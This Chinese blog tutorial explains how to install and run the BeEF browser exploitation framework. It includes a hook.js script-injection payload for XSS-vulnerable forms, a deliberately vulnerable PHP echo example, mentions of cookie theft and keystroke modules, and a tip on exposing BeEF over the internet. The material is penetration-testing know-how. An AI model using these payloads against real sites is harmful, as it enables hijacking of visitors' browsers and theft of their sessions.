XSS渗透框架Beef的安装和简单使用

BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。

下载beef
https://github.com/beefproject/beef

解压进入beef-master
2020-11-09_20-47.png
输入bundle install进行安装

安装完成后需要打开config.yaml修改帐号密码
2020-11-09_20-47_1.png
修改密码之后启动beef

./beef

在浏览器内输入命令行界面的http://本机ip:3000/ui/authentication访问,在beef登录界面输入beef的用户名和密码登录beef界面


登录后,将<script src='http://IP(运行beef主机的IP):3000/hook.js'></script>插入存在xss漏洞的表单中,然后访问被上马的网页。如图
2020-11-09_20-44.png

回到Manjaro,出现了被攻击的机子,这时你就可以用Commands模块的功能为所欲为了。

### BeEF XSS Framework 使用指南 #### 什么是BeEFBeEF(Browser Exploitation Framework)是一个用于浏览器渗透测试的工具框架。它允许安全研究人员分析演示浏览器作为攻击媒介的风险。通过注入恶意JavaScript代码,BeEF可以控制受害者的浏览器会话,并执行多种攻击向量。 #### 安装BeEF安装BeEF,可以通过以下命令完成: ```bash git clone https://github.com/beefproject/beef.git cd beef bundle install ``` 运行BeEF服务时,使用如下命令: ```bash ruby beef.rb ``` 默认情况下,BeEF会在`http://localhost:3000/ui/panel`上启动管理界面,默认用户名密码均为`beef`[^4]。 #### 配置BeEF Hook Script 为了利用BeEF的功能,需要将目标用户的浏览器连接到BeEF服务器。这通常通过在存在XSS漏洞的目标网站中嵌入`hook.js`脚本来实现。例如,在反射型或存储型XSS场景下,可以插入以下HTML代码片段: ```html <script src="http://<your_beef_server_ip>:3000/hook.js"></script> ``` 这里的`<your_beef_server_ip>`应替换为实际部署BeEF的IP地址。 #### 测试环境搭建 假设已经有一个本地PHP文件`xss.php`,其中包含简单的反射型XSS漏洞。以下是可能的内容示例: ```php <?php echo $_GET['input']; ?> ``` 访问URL `http://127.0.0.1/engineer/xss.php?input=<script%20src="http://<your_beef_server_ip>:3000/hook.js"></script>` 将触发BeEF钩子脚本加载[^3]。 #### 利用BeEF进行渗透测试 一旦受害者浏览了含有上述脚本的页面,他们的浏览器会被标记为“在线”,并显示在BeEF控制面板中的模块列表里。此时可以选择不同的攻击模块来评估潜在风险,比如收集系统信息、窃取Cookie或者模拟键盘输入等操作。 #### 跨网络使用BeEF (BeeF-Over-Wan) 对于希望在外网环境下开展测试的情况,推荐采用类似Ngrok这样的反向代理解决方案。具体做法涉及设置隧道并将外部流量导向内部BeEF实例。有关更详细的指导,请参阅专门文档[BeeF-Over-Wan](https://github.com/snoopysecurity/beef-over-wan)[^5]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值